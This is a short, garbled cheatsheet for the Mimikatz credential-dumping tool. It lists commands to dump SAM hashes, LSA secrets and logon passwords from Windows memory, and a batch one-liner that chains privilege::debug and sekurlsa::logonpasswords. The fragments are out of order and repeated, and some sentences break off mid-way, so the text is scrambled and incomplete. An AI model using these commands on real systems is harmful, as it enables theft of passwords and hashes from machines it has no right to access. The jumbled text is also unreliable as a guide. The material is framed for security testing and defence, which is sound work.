| Command | Purpose | | :--- | :--- | | lsadump::sam | Dumps local SAM hashes (NTLM) from the registry. | | lsadump::sam /sam:FILE /system:FILE | Dump SAM from saved hive files (offline). | | lsadump::secrets | Dumps secrets from the SECURITY registry (e.g., cached domain logons). | Simulate a domain controller to request password hashes for any user.
Mimikatz is arguably the most powerful and infamous post-exploitation tool ever created. Developed by Benjamin Delpy (@gentilkiwi), it allows security professionals to extract plaintext passwords, hashes, PINs, and Kerberos tickets directly from Windows memory. mimikatz cheatsheet
echo privilege::debug >> commands.txt echo sekurlsa::logonpasswords >> commands.txt echo exit >> commands.txt mimikatz.exe ""script:commands.txt"" If you are defending a network, you must assume Mimikatz will be used. | Command | Purpose | | :--- |
However, with great power comes great responsibility. This cheatsheet is strictly for . ⚠️ Warning: Modern Antivirus (AV) and Endpoint Detection & Response (EDR) aggressively flag Mimikatz. You will rarely run the vanilla .exe on a live engagement today. Phase 1: Loading & Privilege Escalation Before running any commands, you must load Mimikatz and gain the necessary rights. | Simulate a domain controller to request password